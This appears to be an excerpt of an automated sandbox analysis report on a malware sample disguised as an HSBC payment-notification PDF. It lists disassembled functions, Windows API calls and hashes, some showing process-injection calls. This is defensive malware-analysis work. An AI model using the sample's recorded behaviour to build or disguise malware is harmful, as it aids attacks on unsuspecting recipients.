                                                                                                                                                    • Opcode ID: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
                                                                                                                                                    • Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
                                                                                                                                                    • Opcode Fuzzy Hash: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
                                                                                                                                                    • Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
                                                                                                                                                    Function 00AC0585 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNEL32(?,00000000), ref: 00AC0DB5
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00AC0DD9
                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00AC0DFB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                    • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                                                    • Instruction ID: 1abb0390d8b55cf11d8b05e2be2f1c1d67791c1483496d943392739144675c26
                                                                                                                                                    • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                                                    • Instruction Fuzzy Hash: 7012CC24E24658C6EB24DF64D8507DEB232EF68300F1091ED910DEB7A5E77A4E81CF5A
                                                                                                                                                    Function 02F19B88 Relevance: 1.7, APIs: 1, Instructions: 236COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 2360f87b1ef59b3aa0b453d18c10f7173363f48802594d37deeb67b3fae5a281
                                                                                                                                                    • Instruction ID: 601f9b4c13dffd19c83dd984056262cdd0ab5ca04344637fbae75c7248afed11
                                                                                                                                                    • Opcode Fuzzy Hash: 2360f87b1ef59b3aa0b453d18c10f7173363f48802594d37deeb67b3fae5a281
                                                                                                                                                    • Instruction Fuzzy Hash: 2A81BA25D0D3C09EEB2687248A757367FE15F526E8FCC458ED3D6871E2C3A59408C792
                                                                                                                                                    Function 02F19E10 Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c8c88c0247d0b9b6ca8d51729b0c1c1a2294919098552b49130528ba5c7d99ad
                                                                                                                                                    • Instruction ID: 44d49e51eb9cd6778ae44b1ba10acef5439c64be1ba8b2bbb65ad2d3610aee49
                                                                                                                                                    • Opcode Fuzzy Hash: c8c88c0247d0b9b6ca8d51729b0c1c1a2294919098552b49130528ba5c7d99ad
                                                                                                                                                    • Instruction Fuzzy Hash: 5D512775E0D3809AEB39CB288964736BBE05F526E8FCC055ED7C687291C3B69504C793
                                                                                                                                                    Function 00411FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
                                                                                                                                                    • Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
                                                                                                                                                    • Opcode Fuzzy Hash: 9a4eac9cae6ae412a9e9d844f6cabf31f1ec9c88f92de94d838ac32c95e10256
                                                                                                                                                    • Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49
                                                                                                                                                    Function 00405AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                                                                                                                    • Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
                                                                                                                                                    • Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                                                                                                                                                    • Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95
                                                                                                                                                    Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                    • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                    • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                                                                                                                    Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                                                                                    • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                                                                                                                    • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                                                                                    • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                                                                                                                    Function 02F1AEAC Relevance: 1.6, APIs: 1, Instructions: 84fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 02F1979E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: 4be3afc176c62104ef7d771525130a9172a340e0817448280353b45cc5c94892
                                                                                                                                                    • Instruction ID: f998dfb0d101f783272695e67483f77f4669e5ab8cf730cfae17945cb8d13de6
                                                                                                                                                    • Opcode Fuzzy Hash: 4be3afc176c62104ef7d771525130a9172a340e0817448280353b45cc5c94892
                                                                                                                                                    • Instruction Fuzzy Hash: 2D21A521D4E3909ED7268A2984647367FE06F522E8FCC858DE3D58B2D2C3B98409C793
                                                                                                                                                    Function 004059B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                                                                                                                                                    • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                                                                                                                                                    • Opcode Fuzzy Hash: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                                                                                                                                                    • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                                                                                                                                                    Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                                                                                                                      • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                                                                                      • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                                                                                                                      • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1396898556-0
                                                                                                                                                    • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                                                                                    • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                                                                                                                    • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                                                                                    • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                                                                                                                    Function 00407F77 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                                                                                                                                                    • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                                                                                                                                                    • Opcode Fuzzy Hash: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                                                                                                                                                    • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                                                                                                                                                    Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                    • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                                                                                                    • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                    • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                                                                                                    Function 02F1AE0D Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                    • Opcode ID: 87fccc5edf4a387de68764ed7d51f5f0bba5ca0544cfb9e267408c5337a6cf56
                                                                                                                                                    • Instruction ID: d77753744174b75552d5053113ce1c69ebd91c424c82c509592fde871d5d27f3
                                                                                                                                                    • Opcode Fuzzy Hash: 87fccc5edf4a387de68764ed7d51f5f0bba5ca0544cfb9e267408c5337a6cf56
                                                                                                                                                    • Instruction Fuzzy Hash: 0021F76290E3C0AED3178729C41571BBFE05B96654F89C89EF1D58B2D2D3798808D7A3
                                                                                                                                                    Function 00405BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                                                                                                                    • Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
                                                                                                                                                    • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                                                                                                                    • Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64
                                                                                                                                                    Function 00405A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                                                                                                                                                    • Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
                                                                                                                                                    • Opcode Fuzzy Hash: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                                                                                                                                                    • Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4
                                                                                                                                                    Function 02F1AEFF Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: efd3b46b1b600033ec526e97fb549c3f26ef05aa17feba7ce22dd9e358b415ba
                                                                                                                                                    • Instruction ID: ba98c84a74493c9132fe5ca0d54e236106a19fb28495d75048563f6538a5388b
                                                                                                                                                    • Opcode Fuzzy Hash: efd3b46b1b600033ec526e97fb549c3f26ef05aa17feba7ce22dd9e358b415ba
                                                                                                                                                    • Instruction Fuzzy Hash: 90018475D0A3009BEB24DF35C52573BB7A06BD56D4FC4454EE39A82251E7B4C014C783
                                                                                                                                                    Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock_file.LIBCMT ref: 004248A6
